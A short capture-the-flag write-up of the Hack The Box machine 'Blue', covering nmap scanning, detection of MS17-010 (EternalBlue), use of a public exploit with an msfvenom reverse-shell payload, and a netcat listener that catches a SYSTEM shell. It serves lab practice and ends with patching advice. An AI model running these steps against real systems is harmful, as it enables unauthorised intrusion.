I know there are plenty of well-documented/detailed write-ups about most, if not all, the retired and active boxes on HTB. Most of the write-ups I post will be quick, straight to the point and consist of my methods for reconnaissance, scanning & enumeration of services, exploitation and some post exploitation/flag grabbing.
Blue is an easy Windows box that can be exploited using a very well known exploit. This is a pretty trivial box if you know what to look for. With that being said, lets jump right in!
As always, I am going to run my initial nmap scan:
nmap -sC -sV -A -O -v -oA Scan/init 10.10.10.40
In the order of the nmap flags above, the default nmap scripts are ran against the target. To do this we set the -sC flag. I will ensure I have the -sV flag set to detect the version of any found services. Flags -A & -O- tell nmap to be very aggressive, and attempt to detect the OS of the host. Flags -v and -oA tells nmap to be verbose and to output all formats in the specified directory; in this case Scan is the directory and init will be the file that holds my initial scan results.
After the initial scan we see the following open ports:
Ports 139/445 NetBIOS/SMB jumps out. Let’s see if these services are vulnerable. I am going to run the default nmap vulnerability scripts against the target to see if there are any known vulnerabilities associated with the NetBIOS/SMB ports.
nmap -script=vuln -p 139,445 10.10.10.40
The findings show that the target is vulnerable to MS17–010 aka EternalBlue. This was a devastating exploit developed by the NSA and leaked by the Shadow Brokers in 2017.
MS17–010 can be exploited different ways using manual exploitation or Metasploit. I am going to download the exploit from github using helvio junior’s repository. Once downloaded, you see the different exploits as seen below:
Once this is downloaded, we can use msfvenom to create our payload which will give us a reverse shell.
Make sure you start a netcat listener in a new tab or window.
nc -nvlp 1337
Time for the fun part, exploitation! To ensure this works, you will need to use Python2. If you use Python3 without manually changing some of the code to be compatible with Python3 you will have some issues.
Viola! The exploit worked and now I have System privileges.
This was an easy box to exploit, but this target shows why it is important to keep systems up to date with the latest patches. Also, never expose NetBIOS/SMB to the internet unless you want someone to test your systems “free of charge” :).